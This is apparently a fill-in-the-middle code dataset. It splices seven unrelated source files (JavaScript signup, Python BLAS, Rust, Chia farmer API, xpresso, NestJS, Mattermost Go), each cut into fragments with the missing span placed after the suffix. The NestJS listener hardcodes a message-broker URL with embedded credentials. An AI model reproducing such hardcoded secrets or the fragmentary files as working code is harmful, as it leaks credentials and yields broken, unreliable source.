$location,
AppModel,
dispatchers,
gettextCatalog,
settingsApi,
signupModel,
authentication,
lazyLoader,
Address,
$state,
setupKeys,
notification
) {
const CACHE = {};
const { dispatcher } = dispatchers(['signup']);
const dispatch = (type, data = {}) => dispatcher.signup(type, data);
const I18N = {
ERROR_ADDRESS_CREATION: gettextCatalog.getString('Something went wrong during address creation', null, 'Error'),
ERROR_PROCESS: gettextCatalog.getString('Something went wrong', null, 'Error')
};
async function doCreateUser(model) {
dispatch('create.user', { value: true });
try {
const { data } = await signupModel.createUser(model);
return data;
} catch (e) {
const { data = {} } = e;
// Failed Human verification
if (data.Code === API_CUSTOM_ERROR_CODES.USER_CREATE_TOKEN_INVALID) {
dispatch('creating', { value: false });
dispatch('chech.humanity', { value: true });
return Promise.reject({
error: new Error(data.Error),
verbose: false
});
}
return Promise.reject({
error: new Error(data.Error),
verbose: true
});
}
}
async function setUserLanguage() {
if ($location.search().language) {
return settingsApi.updateLocale({ Locale: gettextCatalog.getCurrentLanguage() });
}
}
function doLogUserIn() {
dispatch('loguserin', { value: true });
return authentication
.loginWithCredentials({
Username: signupModel.get('username'),
Password: signupModel.getPassword()
})
.then(({ data }) => {
authentication.receivedCredentials(data);
return authentication.setAuthCookie(data);
})
.then(() => {
AppModel.set('isLoggedIn', authentication.isLoggedIn());
AppModel.set('isLocked', authentication.isLocked());
AppModel.set('isSecure', authentication.isSecured());
});
}
async function doAccountSetup() {
dispatch('setup.account', { value: true });
try {
const { data } = await Address.setup({ Domain: signupModel.getDomain() });
CACHE.setupPayload.keys[0].AddressID = data.Address.ID;
return setupKeys.setup(CACHE.setupPayload, signupModel.getPassword()).then(() => {
authentication.savePassword(CACHE.setupPayload.mailboxPassword);
AppModel.set('isLoggedIn', authentication.isLoggedIn());
AppModel.set('isLocked', authentication.isLocked());
AppModel.set('isSecure', authentication.isSecured());
return data;
});
} catch (err) {
const { data = {} } = err;
if (data.Error) {
throw new Error(data.Error);
}
throw err;
}
}
async function doGetUserInfo() {
dispatch('user.get', { value: true });
await lazyLoader.app();
return authentication.fetchUserInfo();
}
function finishRedirect() {
dispatch('user.finish', { value: true });
delete CACHE.setupPayload;
if (authentication.user.Delinquent < UNPAID_STATE.DELINQUENT) {
return $state.go('secured.inbox', { welcome: WIZARD_ENABLED });
}
$state.go('secured.dashboard');
}
const createAddress = async () => {
try {
return await doLogUserIn().then(doAccountSetup);
} catch (e) {
const { data = {} } = e;
if (data.Error) {
return Promise.reject({
error: new Error(data.Error || I18N.ERROR_ADDRESS_CREATION),
verbose: true,
redirect: 'login'
});
}
throw e;
}
};
const create = async (model) => {
await doCreateUser(model);
await createAddress();
return setUserLanguage()
.then(doGetUserInfo)
.then(finishRedirect);
};
function generateNewKeys() {
dispatch('generate.newkeys', { value: true });
return setupKeys
.generate([{ ID: 0, Email: signupModel.getEmail() }], signupModel.getPassword())
.then((result) => (CACHE.setupPayload = result));
}
const createAccount = (model) => {
create(model).catch((e) => {
notification.error(e.error ? e.error.message : I18N.ERROR_PROCESS);
dispatch('signup.error', { value: true });
console.error(e);
e.redirect && $state.go(e.redirect);
});
};
return { createAccount, generateNewKeys };
}
export default signupUserProcess;
| signupUserProcess |
scnrm2.py | import numpy as np
from ..util import slice_
def scnrm2(N, X, INCX):
"""Computes the Euclidean norm of the vector x
Parameters
----------
N : int
Number of elements in input vector
X : numpy.ndarray
A single precision complex array, dimension (1 + (`N` - 1)*abs(`INCX`))
INCX : int
Storage spacing between elements of `X`
Returns
-------
numpy.single
See Also
--------
snrm2 : Single-precision real euclidean norm
dnrm2 : Double-precision real euclidean norm
dznrm2 : Double-precision complex euclidean norm
Notes
-----
Online PyBLAS documentation: https://nbviewer.jupyter.org/github/timleslie/pyblas/blob/main/docs/scnrm2.ipynb
Reference BLAS documentation: https://github.com/Reference-LAPACK/lapack/blob/v3.9.0/BLAS/SRC/scnrm2.f
Examples
--------
>>> x = np.array([1+2j, 2+3j, 3+4j], dtype=np.complex64)
>>> N = len(x)
>>> incx = 1
>>> print(scnrm2(N, x, incx)
6.5574384
"""
if N <= 0:
|
# Note: This implementaiton suffers from potential overflow errors for large vector values.
# More sophisticated implementations can avoid this with appropriate scaling applied before
# taking the square of large values.
return np.sqrt((X[slice_(N, INCX)].conj() * X[slice_(N, INCX)]).sum().real)
| return 0 |
asyncstr.rs | use std::{io, pin::Pin, str};
use futures::{
io::BufReader,
task::{Context, Poll},
AsyncBufRead, AsyncRead,
};
#[derive(thiserror::Error, Debug)]
pub(crate) enum Error {
#[error(transparent)]
IoError(#[from] io::Error),
#[error(transparent)]
Utf8Error(#[from] str::Utf8Error),
}
pin_project_lite::pin_project! {
pub(crate) struct AsyncStrReader<R> {
#[pin]
inner: BufReader<R>,
}
}
impl<R: AsyncRead + Unpin> AsyncStrReader<R> {
#[inline]
pub(crate) fn new(inner: R) -> Self {
Self {
inner: BufReader::new(inner),
}
}
#[inline]
pub(crate) fn with_capacity(capacity: usize, inner: R) -> Self {
Self {
inner: BufReader::with_capacity(capacity, inner),
}
}
pub(crate) fn poll_fill_buf(
self: Pin<&mut Self>,
cx: &mut Context<'_>,
) -> Poll<Result<&str, Error>> {
let this = self.project();
match this.inner.poll_fill_buf(cx) {
Poll::Ready(Ok(buf)) => {
match str::from_utf8(buf) {
Ok(s) => Poll::Ready(Ok(s)),
Err(err) => {
// The data is just plain invalid unicode
if err.error_len().is_some() {
Poll::Ready(Err(err.into()))
} else {
let valid_len = err.valid_up_to();
// Safety: We know the string is partially valid
// up to `valid_len`
unsafe { Poll::Ready(Ok(str::from_utf8_unchecked(&buf[..valid_len]))) }
}
}
}
}
Poll::Ready(Err(err)) => Poll::Ready(Err(err.into())),
Poll::Pending => {
cx.waker().wake_by_ref();
Poll::Pending
}
}
}
#[inline]
pub(crate) fn | (self: Pin<&mut Self>, amt: usize) {
let this = self.project();
this.inner.consume(amt);
}
}
#[cfg(test)]
mod tests {
use futures::{io::Cursor, task};
use super::*;
fn cx<'a>() -> Context<'a> {
Context::from_waker(task::noop_waker_ref())
}
fn assert_str<R: AsyncRead + Unpin>(
cx: &mut Context<'_>,
buf: &mut AsyncStrReader<R>,
s: &str,
) {
let mut buf = Pin::new(buf);
assert!(matches!(
buf.as_mut().poll_fill_buf(cx),
Poll::Ready(Ok(ss)) if ss == s
));
buf.consume(s.len());
}
fn assert_utf8_error<R: AsyncRead + Unpin>(cx: &mut Context<'_>, buf: &mut AsyncStrReader<R>) {
assert!(matches!(
Pin::new(buf).poll_fill_buf(cx),
Poll::Ready(Err(Error::Utf8Error(_)))
));
}
#[test]
fn empty() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new(""));
assert_str(&mut cx, &mut buf, "");
}
#[test]
fn single_char() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new("a"));
assert_str(&mut cx, &mut buf, "a");
assert_str(&mut cx, &mut buf, "");
}
#[test]
fn single_multibyte_char() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new("ท"));
assert_str(&mut cx, &mut buf, "ท");
assert_str(&mut cx, &mut buf, "");
}
#[test]
fn word() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new("hello"));
assert_str(&mut cx, &mut buf, "hello");
assert_str(&mut cx, &mut buf, "");
}
#[test]
fn invalid_sequence() {
let mut cx = cx();
let mut buf = AsyncStrReader::new(Cursor::new([0xe2, 0x28, 0xa1]));
assert_utf8_error(&mut cx, &mut buf);
}
#[test]
fn buffer_full() {
let mut cx = cx();
let mut buf = AsyncStrReader::with_capacity(5, Cursor::new("helloworld"));
assert_str(&mut cx, &mut buf, "hello");
assert_str(&mut cx, &mut buf, "world");
assert_str(&mut cx, &mut buf, "");
}
}
| consume |
farmer_api.py | import json
import time
from typing import Callable, Optional, List, Any, Dict
import aiohttp
from blspy import AugSchemeMPL, G2Element, PrivateKey
import chia.server.ws_connection as ws
from chia.consensus.pot_iterations import calculate_iterations_quality, calculate_sp_interval_iters
from chia.farmer.farmer import Farmer
from chia.protocols import farmer_protocol, harvester_protocol
from chia.protocols.harvester_protocol import PoolDifficulty
from chia.protocols.pool_protocol import (
get_current_authentication_token,
PoolErrorCode,
PostPartialRequest,
PostPartialPayload,
)
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.server.outbound_message import NodeType, make_msg
from chia.server.server import ssl_context_for_root
from chia.ssl.create_ssl import get_mozilla_ca_crt
from chia.types.blockchain_format.pool_target import PoolTarget
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.util.api_decorators import api_request, peer_required
from chia.util.ints import uint32, uint64
class | :
farmer: Farmer
def __init__(self, farmer) -> None:
self.farmer = farmer
def _set_state_changed_callback(self, callback: Callable):
self.farmer.state_changed_callback = callback
@api_request
@peer_required
async def new_proof_of_space(
self, new_proof_of_space: harvester_protocol.NewProofOfSpace, peer: ws.WSChiaConnection
):
"""
This is a response from the harvester, for a NewChallenge. Here we check if the proof
of space is sufficiently good, and if so, we ask for the whole proof.
"""
if new_proof_of_space.sp_hash not in self.farmer.number_of_responses:
self.farmer.number_of_responses[new_proof_of_space.sp_hash] = 0
self.farmer.cache_add_time[new_proof_of_space.sp_hash] = uint64(
int(time.time()))
max_pos_per_sp = 5
if self.farmer.number_of_responses[new_proof_of_space.sp_hash] > max_pos_per_sp:
# This will likely never happen for any farmer with less than 10% of global space
# It's meant to make testnets more stable
self.farmer.log.info(
f"Surpassed {max_pos_per_sp} PoSpace for one SP, no longer submitting PoSpace for signage point "
f"{new_proof_of_space.sp_hash}"
)
return None
if new_proof_of_space.sp_hash not in self.farmer.sps:
self.farmer.log.warning(
f"Received response for a signage point that we do not have {new_proof_of_space.sp_hash}"
)
return None
sps = self.farmer.sps[new_proof_of_space.sp_hash]
for sp in sps:
computed_quality_string = new_proof_of_space.proof.verify_and_get_quality_string(
self.farmer.constants,
new_proof_of_space.challenge_hash,
new_proof_of_space.sp_hash,
)
if computed_quality_string is None:
self.farmer.log.error(
f"Invalid proof of space {new_proof_of_space.proof}")
return None
self.farmer.number_of_responses[new_proof_of_space.sp_hash] += 1
required_iters: uint64 = calculate_iterations_quality(
self.farmer.constants.DIFFICULTY_CONSTANT_FACTOR,
computed_quality_string,
new_proof_of_space.proof.size,
sp.difficulty,
new_proof_of_space.sp_hash,
)
# If the iters are good enough to make a block, proceed with the block making flow
if required_iters < calculate_sp_interval_iters(self.farmer.constants, sp.sub_slot_iters):
# Proceed at getting the signatures for this PoSpace
request = harvester_protocol.RequestSignatures(
new_proof_of_space.plot_identifier,
new_proof_of_space.challenge_hash,
new_proof_of_space.sp_hash,
[sp.challenge_chain_sp, sp.reward_chain_sp],
)
if new_proof_of_space.sp_hash not in self.farmer.proofs_of_space:
self.farmer.proofs_of_space[new_proof_of_space.sp_hash] = [
]
self.farmer.proofs_of_space[new_proof_of_space.sp_hash].append(
(
new_proof_of_space.plot_identifier,
new_proof_of_space.proof,
)
)
self.farmer.cache_add_time[new_proof_of_space.sp_hash] = uint64(
int(time.time()))
self.farmer.quality_str_to_identifiers[computed_quality_string] = (
new_proof_of_space.plot_identifier,
new_proof_of_space.challenge_hash,
new_proof_of_space.sp_hash,
peer.peer_node_id,
)
self.farmer.cache_add_time[computed_quality_string] = uint64(
int(time.time()))
await peer.send_message(make_msg(ProtocolMessageTypes.request_signatures, request))
p2_singleton_puzzle_hash = new_proof_of_space.proof.pool_contract_puzzle_hash
if p2_singleton_puzzle_hash is not None:
# Otherwise, send the proof of space to the pool
# When we win a block, we also send the partial to the pool
if p2_singleton_puzzle_hash not in self.farmer.pool_state:
self.farmer.log.info(
f"Did not find pool info for {p2_singleton_puzzle_hash}")
return
pool_state_dict: Dict = self.farmer.pool_state[p2_singleton_puzzle_hash]
pool_url = pool_state_dict["pool_config"].pool_url
if pool_url == "":
return
if pool_state_dict["current_difficulty"] is None:
self.farmer.log.warning(
f"No pool specific difficulty has been set for {p2_singleton_puzzle_hash}, "
f"check communication with the pool, skipping this partial to {pool_url}."
)
return
required_iters = calculate_iterations_quality(
self.farmer.constants.DIFFICULTY_CONSTANT_FACTOR,
computed_quality_string,
new_proof_of_space.proof.size,
pool_state_dict["current_difficulty"],
new_proof_of_space.sp_hash,
)
if required_iters >= calculate_sp_interval_iters(
self.farmer.constants, self.farmer.constants.POOL_SUB_SLOT_ITERS
):
self.farmer.log.info(
f"Proof of space not good enough for pool {pool_url}: {pool_state_dict['current_difficulty']}"
)
return
authentication_token_timeout = pool_state_dict["authentication_token_timeout"]
if authentication_token_timeout is None:
self.farmer.log.warning(
f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}"
f", check communication with the pool."
)
return
# Submit partial to pool
is_eos = new_proof_of_space.signage_point_index == 0
payload = PostPartialPayload(
pool_state_dict["pool_config"].launcher_id,
get_current_authentication_token(
authentication_token_timeout),
new_proof_of_space.proof,
new_proof_of_space.sp_hash,
is_eos,
peer.peer_node_id,
)
# The plot key is 2/2 so we need the harvester's half of the signature
m_to_sign = payload.get_hash()
request = harvester_protocol.RequestSignatures(
new_proof_of_space.plot_identifier,
new_proof_of_space.challenge_hash,
new_proof_of_space.sp_hash,
[m_to_sign],
)
response: Any = await peer.request_signatures(request)
if not isinstance(response, harvester_protocol.RespondSignatures):
self.farmer.log.error(
f"Invalid response from harvester: {response}")
return
assert len(response.message_signatures) == 1
plot_signature: Optional[G2Element] = None
for sk in self.farmer.get_private_keys():
pk = sk.get_g1()
if pk == response.farmer_pk:
agg_pk = ProofOfSpace.generate_plot_public_key(
response.local_pk, pk, True)
assert agg_pk == new_proof_of_space.proof.plot_public_key
sig_farmer = AugSchemeMPL.sign(sk, m_to_sign, agg_pk)
taproot_sk: PrivateKey = ProofOfSpace.generate_taproot_sk(
response.local_pk, pk)
taproot_sig: G2Element = AugSchemeMPL.sign(
taproot_sk, m_to_sign, agg_pk)
plot_signature = AugSchemeMPL.aggregate(
[sig_farmer, response.message_signatures[0][1], taproot_sig]
)
assert AugSchemeMPL.verify(
agg_pk, m_to_sign, plot_signature)
authentication_pk = pool_state_dict["pool_config"].authentication_public_key
if bytes(authentication_pk) is None:
self.farmer.log.error(
f"No authentication sk for {authentication_pk}")
return
authentication_sk: PrivateKey = self.farmer.authentication_keys[bytes(
authentication_pk)]
authentication_signature = AugSchemeMPL.sign(
authentication_sk, m_to_sign)
assert plot_signature is not None
agg_sig: G2Element = AugSchemeMPL.aggregate(
[plot_signature, authentication_signature])
post_partial_request: PostPartialRequest = PostPartialRequest(
payload, agg_sig)
post_partial_body = json.dumps(
post_partial_request.to_json_dict())
self.farmer.log.info(
f"Submitting partial for {post_partial_request.payload.launcher_id.hex()} to {pool_url}"
)
pool_state_dict["points_found_since_start"] += pool_state_dict["current_difficulty"]
pool_state_dict["points_found_24h"].append(
(time.time(), pool_state_dict["current_difficulty"]))
headers = {
"content-type": "application/json;",
}
try:
async with aiohttp.ClientSession() as session:
async with session.post(
f"{pool_url}/partial",
data=post_partial_body,
headers=headers,
ssl=ssl_context_for_root(get_mozilla_ca_crt()),
) as resp:
if resp.ok:
pool_response: Dict = json.loads(await resp.text())
self.farmer.log.info(
f"Pool response: {pool_response}")
if "error_code" in pool_response:
self.farmer.log.error(
f"Error in pooling: "
f"{pool_response['error_code'], pool_response['error_message']}"
)
pool_state_dict["pool_errors_24h"].append(
pool_response)
if pool_response["error_code"] == PoolErrorCode.PROOF_NOT_GOOD_ENOUGH.value:
self.farmer.log.error(
"Partial not good enough, forcing pool farmer update to "
"get our current difficulty."
)
pool_state_dict["next_farmer_update"] = 0
await self.farmer.update_pool_state()
else:
new_difficulty = pool_response["new_difficulty"]
pool_state_dict["points_acknowledged_since_start"] += new_difficulty
pool_state_dict["points_acknowledged_24h"].append(
(time.time(), new_difficulty))
pool_state_dict["current_difficulty"] = new_difficulty
else:
self.farmer.log.error(
f"Error sending partial to {pool_url}, {resp.status}")
except Exception as e:
self.farmer.log.error(f"Error connecting to pool: {e}")
return
return
@api_request
async def respond_signatures(self, response: harvester_protocol.RespondSignatures):
"""
There are two cases: receiving signatures for sps, or receiving signatures for the block.
"""
if response.sp_hash not in self.farmer.sps:
self.farmer.log.warning(
f"Do not have challenge hash {response.challenge_hash}")
return None
is_sp_signatures: bool = False
sps = self.farmer.sps[response.sp_hash]
signage_point_index = sps[0].signage_point_index
found_sp_hash_debug = False
for sp_candidate in sps:
if response.sp_hash == response.message_signatures[0][0]:
found_sp_hash_debug = True
if sp_candidate.reward_chain_sp == response.message_signatures[1][0]:
is_sp_signatures = True
if found_sp_hash_debug:
assert is_sp_signatures
pospace = None
for plot_identifier, candidate_pospace in self.farmer.proofs_of_space[response.sp_hash]:
if plot_identifier == response.plot_identifier:
pospace = candidate_pospace
assert pospace is not None
include_taproot: bool = pospace.pool_contract_puzzle_hash is not None
computed_quality_string = pospace.verify_and_get_quality_string(
self.farmer.constants, response.challenge_hash, response.sp_hash
)
if computed_quality_string is None:
self.farmer.log.warning(f"Have invalid PoSpace {pospace}")
return None
if is_sp_signatures:
(
challenge_chain_sp,
challenge_chain_sp_harv_sig,
) = response.message_signatures[0]
reward_chain_sp, reward_chain_sp_harv_sig = response.message_signatures[1]
for sk in self.farmer.get_private_keys():
pk = sk.get_g1()
if pk == response.farmer_pk:
agg_pk = ProofOfSpace.generate_plot_public_key(
response.local_pk, pk, include_taproot)
assert agg_pk == pospace.plot_public_key
if include_taproot:
taproot_sk: PrivateKey = ProofOfSpace.generate_taproot_sk(
response.local_pk, pk)
taproot_share_cc_sp: G2Element = AugSchemeMPL.sign(
taproot_sk, challenge_chain_sp, agg_pk)
taproot_share_rc_sp: G2Element = AugSchemeMPL.sign(
taproot_sk, reward_chain_sp, agg_pk)
else:
taproot_share_cc_sp = G2Element()
taproot_share_rc_sp = G2Element()
farmer_share_cc_sp = AugSchemeMPL.sign(
sk, challenge_chain_sp, agg_pk)
agg_sig_cc_sp = AugSchemeMPL.aggregate(
[challenge_chain_sp_harv_sig,
farmer_share_cc_sp, taproot_share_cc_sp]
)
assert AugSchemeMPL.verify(
agg_pk, challenge_chain_sp, agg_sig_cc_sp)
# This means it passes the sp filter
farmer_share_rc_sp = AugSchemeMPL.sign(
sk, reward_chain_sp, agg_pk)
agg_sig_rc_sp = AugSchemeMPL.aggregate(
[reward_chain_sp_harv_sig,
farmer_share_rc_sp, taproot_share_rc_sp]
)
assert AugSchemeMPL.verify(
agg_pk, reward_chain_sp, agg_sig_rc_sp)
if pospace.pool_public_key is not None:
assert pospace.pool_contract_puzzle_hash is None
pool_pk = bytes(pospace.pool_public_key)
if pool_pk not in self.farmer.pool_sks_map:
self.farmer.log.error(
f"Don't have the private key for the pool key used by harvester: {pool_pk.hex()}"
)
return None
pool_target: Optional[PoolTarget] = PoolTarget(
self.farmer.pool_target, uint32(0))
assert pool_target is not None
pool_target_signature: Optional[G2Element] = AugSchemeMPL.sign(
self.farmer.pool_sks_map[pool_pk], bytes(
pool_target)
)
else:
assert pospace.pool_contract_puzzle_hash is not None
pool_target = None
pool_target_signature = None
request = farmer_protocol.DeclareProofOfSpace(
response.challenge_hash,
challenge_chain_sp,
signage_point_index,
reward_chain_sp,
pospace,
agg_sig_cc_sp,
agg_sig_rc_sp,
self.farmer.farmer_target,
pool_target,
pool_target_signature,
)
self.farmer.state_changed(
"proof", {"proof": request, "passed_filter": True})
msg = make_msg(
ProtocolMessageTypes.declare_proof_of_space, request)
await self.farmer.server.send_to_all([msg], NodeType.FULL_NODE)
return None
else:
# This is a response with block signatures
for sk in self.farmer.get_private_keys():
(
foliage_block_data_hash,
foliage_sig_harvester,
) = response.message_signatures[0]
(
foliage_transaction_block_hash,
foliage_transaction_block_sig_harvester,
) = response.message_signatures[1]
pk = sk.get_g1()
if pk == response.farmer_pk:
agg_pk = ProofOfSpace.generate_plot_public_key(
response.local_pk, pk, include_taproot)
assert agg_pk == pospace.plot_public_key
if include_taproot:
taproot_sk = ProofOfSpace.generate_taproot_sk(
response.local_pk, pk)
foliage_sig_taproot: G2Element = AugSchemeMPL.sign(
taproot_sk, foliage_block_data_hash, agg_pk)
foliage_transaction_block_sig_taproot: G2Element = AugSchemeMPL.sign(
taproot_sk, foliage_transaction_block_hash, agg_pk
)
else:
foliage_sig_taproot = G2Element()
foliage_transaction_block_sig_taproot = G2Element()
foliage_sig_farmer = AugSchemeMPL.sign(
sk, foliage_block_data_hash, agg_pk)
foliage_transaction_block_sig_farmer = AugSchemeMPL.sign(
sk, foliage_transaction_block_hash, agg_pk)
foliage_agg_sig = AugSchemeMPL.aggregate(
[foliage_sig_harvester, foliage_sig_farmer,
foliage_sig_taproot]
)
foliage_block_agg_sig = AugSchemeMPL.aggregate(
[
foliage_transaction_block_sig_harvester,
foliage_transaction_block_sig_farmer,
foliage_transaction_block_sig_taproot,
]
)
assert AugSchemeMPL.verify(
agg_pk, foliage_block_data_hash, foliage_agg_sig)
assert AugSchemeMPL.verify(
agg_pk, foliage_transaction_block_hash, foliage_block_agg_sig)
request_to_nodes = farmer_protocol.SignedValues(
computed_quality_string,
foliage_agg_sig,
foliage_block_agg_sig,
)
msg = make_msg(
ProtocolMessageTypes.signed_values, request_to_nodes)
await self.farmer.server.send_to_all([msg], NodeType.FULL_NODE)
"""
FARMER PROTOCOL (FARMER <-> FULL NODE)
"""
@api_request
async def new_signage_point(self, new_signage_point: farmer_protocol.NewSignagePoint):
pool_difficulties: List[PoolDifficulty] = []
for p2_singleton_puzzle_hash, pool_dict in self.farmer.pool_state.items():
if pool_dict["pool_config"].pool_url == "":
# Self pooling
continue
if pool_dict["current_difficulty"] is None:
self.farmer.log.warning(
f"No pool specific difficulty has been set for {p2_singleton_puzzle_hash}, "
f"check communication with the pool, skipping this signage point, pool: "
f"{pool_dict['pool_config'].pool_url} "
)
continue
pool_difficulties.append(
PoolDifficulty(
pool_dict["current_difficulty"],
self.farmer.constants.POOL_SUB_SLOT_ITERS,
p2_singleton_puzzle_hash,
)
)
message = harvester_protocol.NewSignagePointHarvester(
new_signage_point.challenge_hash,
new_signage_point.difficulty,
new_signage_point.sub_slot_iters,
new_signage_point.signage_point_index,
new_signage_point.challenge_chain_sp,
pool_difficulties,
)
msg = make_msg(
ProtocolMessageTypes.new_signage_point_harvester, message)
await self.farmer.server.send_to_all([msg], NodeType.HARVESTER)
if new_signage_point.challenge_chain_sp not in self.farmer.sps:
self.farmer.sps[new_signage_point.challenge_chain_sp] = []
if new_signage_point in self.farmer.sps[new_signage_point.challenge_chain_sp]:
self.farmer.log.debug(
f"Duplicate signage point {new_signage_point.signage_point_index}")
return
self.farmer.sps[new_signage_point.challenge_chain_sp].append(
new_signage_point)
self.farmer.cache_add_time[new_signage_point.challenge_chain_sp] = uint64(
int(time.time()))
tStart = time.time()
self.farmer.lastChannageTime = int(round(tStart * 1000))
self.farmer.state_changed("new_signage_point", {
"sp_hash": new_signage_point.challenge_chain_sp})
@api_request
async def request_signed_values(self, full_node_request: farmer_protocol.RequestSignedValues):
if full_node_request.quality_string not in self.farmer.quality_str_to_identifiers:
self.farmer.log.error(
f"Do not have quality string {full_node_request.quality_string}")
return None
(plot_identifier, challenge_hash, sp_hash, node_id) = self.farmer.quality_str_to_identifiers[
full_node_request.quality_string
]
request = harvester_protocol.RequestSignatures(
plot_identifier,
challenge_hash,
sp_hash,
[full_node_request.foliage_block_data_hash,
full_node_request.foliage_transaction_block_hash],
)
msg = make_msg(ProtocolMessageTypes.request_signatures, request)
await self.farmer.server.send_to_specific([msg], node_id)
@api_request
async def farming_info(self, request: farmer_protocol.FarmingInfo):
timeConsuming = 999
tEnd = time.time()
timeConsuming = int(round(tEnd * 1000)) - self.farmer.lastChannageTime
self.farmer.state_changed(
"new_farming_info",
{
"farming_info": {
"challenge_hash": request.challenge_hash,
"signage_point": request.sp_hash,
"passed_filter": request.passed,
"proofs": request.proofs,
"total_plots": request.total_plots,
"timestamp": request.timestamp,
"timeconsuming": timeConsuming,
}
},
)
@api_request
async def respond_plots(self, _: harvester_protocol.RespondPlots):
self.farmer.log.warning("Respond plots came too late")
| FarmerAPI |
form.py | import inspect
import sys
import typing
from dataclasses import dataclass
if sys.version_info < (3, 8):
from typing_extensions import Literal
else:
from typing import Literal
from di.typing import get_markers_from_parameter
from xpresso._utils.typing import model_field_from_param
from xpresso.binders._body.openapi.form_field import OpenAPIFormFieldMarker
from xpresso.binders._utils.examples import parse_examples
from xpresso.binders.api import ModelNameMap, OpenAPIBody, OpenAPIBodyMarker, Schemas
from xpresso.binders.dependants import BodyBinderMarker
from xpresso.openapi import models as openapi_models
@dataclass(frozen=True)
class OpenAPIFormDataBody(OpenAPIBody):
field_openapi_providers: typing.Mapping[str, OpenAPIBody]
required_fields: typing.List[str]
description: typing.Optional[str]
examples: typing.Optional[typing.Mapping[str, openapi_models.Example]]
media_type: Literal[
"multipart/form-data",
"application/x-www-form-urlencoded",
]
required: bool
nullable: bool
include_in_schema: bool
def get_models(self) -> typing.List[type]:
return [
model
for provider in self.field_openapi_providers.values()
for model in provider.get_models()
]
def get_schema(
self, model_name_map: ModelNameMap, schemas: Schemas
) -> openapi_models.Schema:
properties = {
field_name: field_openapi.get_schema(
model_name_map=model_name_map, schemas=schemas
)
for field_name, field_openapi in self.field_openapi_providers.items()
}
return openapi_models.Schema(
type="object",
properties=properties,
required=self.required_fields or None,
nullable=self.nullable or None,
)
def get_openapi_media_type(
self, model_name_map: ModelNameMap, schemas: Schemas
) -> openapi_models.MediaType:
encodings: typing.Dict[str, openapi_models.Encoding] = {}
for field_name, field_openapi in self.field_openapi_providers.items():
encoding = field_openapi.get_encoding()
if encoding:
encodings[field_name] = encoding
return openapi_models.MediaType(
schema=self.get_schema(model_name_map=model_name_map, schemas=schemas),
examples=self.examples, # type: ignore[arg-type]
encoding=encodings or None,
)
def get_media_type_string(self) -> str:
return self.media_type
def get_openapi(
self, model_name_map: ModelNameMap, schemas: Schemas
) -> openapi_models.RequestBody:
|
@dataclass(frozen=True)
class OpenAPIFormDataMarker(OpenAPIBodyMarker):
description: typing.Optional[str]
examples: typing.Optional[
typing.Dict[str, typing.Union[openapi_models.Example, typing.Any]]
]
media_type: Literal[
"multipart/form-data",
"application/x-www-form-urlencoded",
]
include_in_schema: bool
def register_parameter(self, param: inspect.Parameter) -> OpenAPIBody:
form_data_field = model_field_from_param(param)
if form_data_field.required is False:
required = False
else:
required = True
field_openapi_providers: typing.Dict[str, OpenAPIBody] = {}
required_fields: typing.List[str] = []
# use pydantic to get rid of outer annotated, optional, etc.
annotation = form_data_field.type_
for field_param in inspect.signature(annotation).parameters.values():
marker: typing.Optional[BodyBinderMarker] = None
for param_marker in get_markers_from_parameter(field_param):
if isinstance(param_marker, BodyBinderMarker):
marker = param_marker
break
field_openapi: OpenAPIBodyMarker
if marker is None:
# use the defaults
field_openapi = OpenAPIFormFieldMarker(
alias=None,
style="form",
explode=True,
include_in_schema=True,
)
else:
field_openapi = marker.openapi_marker
provider = field_openapi.register_parameter(field_param)
field_name = provider.get_field_name()
if provider.include_in_schema:
field_openapi_providers[field_name] = provider
field = model_field_from_param(field_param)
if field.required is not False:
required_fields.append(field_name)
examples = parse_examples(self.examples) if self.examples else None
return OpenAPIFormDataBody(
field_openapi_providers=field_openapi_providers,
required_fields=required_fields,
description=self.description,
examples=examples,
media_type=self.media_type,
required=required,
nullable=form_data_field.allow_none,
include_in_schema=self.include_in_schema,
)
| return openapi_models.RequestBody(
description=self.description,
required=self.required,
content={
self.get_media_type_string(): self.get_openapi_media_type(
model_name_map, schemas
)
},
) |
listener.ts | import { NestFactory } from '@nestjs/core';
import { Transport } from '@nestjs/microservices';
import { AppModule } from './app.module';
async function bootstrap() {
const app = await NestFactory.createMicroservice(AppModule, {
transport: Transport.RMQ,
options: {
urls: [
'amqps://xpsgnyxv:[email protected]/xpsgnyxv',
],
queue: 'main_queue',
queueOptions: {
durable: false,
},
},
}); | console.log('microservice is running');
}
bootstrap(); |
app.listen(); |
environment.go | // Copyright (c) 2015-present Mattermost, Inc. All Rights Reserved.
// See License.txt for license information.
// Package pluginenv provides high level functionality for discovering and launching plugins.
package pluginenv
import (
"fmt"
"io/ioutil"
"net/http"
"path/filepath"
"sync"
"github.com/pkg/errors"
"github.com/mattermost/mattermost-server/model"
"github.com/mattermost/mattermost-server/plugin"
)
type APIProviderFunc func(*model.Manifest) (plugin.API, error)
type SupervisorProviderFunc func(*model.BundleInfo) (plugin.Supervisor, error)
type ActivePlugin struct {
BundleInfo *model.BundleInfo
Supervisor plugin.Supervisor
}
// Environment represents an environment that plugins are discovered and launched in.
type Environment struct {
searchPath string
webappPath string
apiProvider APIProviderFunc
supervisorProvider SupervisorProviderFunc
activePlugins map[string]ActivePlugin
mutex sync.RWMutex
}
type Option func(*Environment)
// Creates a new environment. At a minimum, the APIProvider and SearchPath options are required.
func New(options ...Option) (*Environment, error) { | opt(env)
}
if env.supervisorProvider == nil {
env.supervisorProvider = DefaultSupervisorProvider
}
if env.searchPath == "" {
return nil, fmt.Errorf("a search path must be provided")
}
return env, nil
}
// Returns the configured webapp path.
func (env *Environment) WebappPath() string {
return env.webappPath
}
// Returns the configured search path.
func (env *Environment) SearchPath() string {
return env.searchPath
}
// Returns a list of all plugins found within the environment.
func (env *Environment) Plugins() ([]*model.BundleInfo, error) {
return ScanSearchPath(env.searchPath)
}
// Returns a list of all currently active plugins within the environment.
func (env *Environment) ActivePlugins() []*model.BundleInfo {
env.mutex.RLock()
defer env.mutex.RUnlock()
activePlugins := []*model.BundleInfo{}
for _, p := range env.activePlugins {
activePlugins = append(activePlugins, p.BundleInfo)
}
return activePlugins
}
// Returns the ids of the currently active plugins.
func (env *Environment) ActivePluginIds() (ids []string) {
env.mutex.RLock()
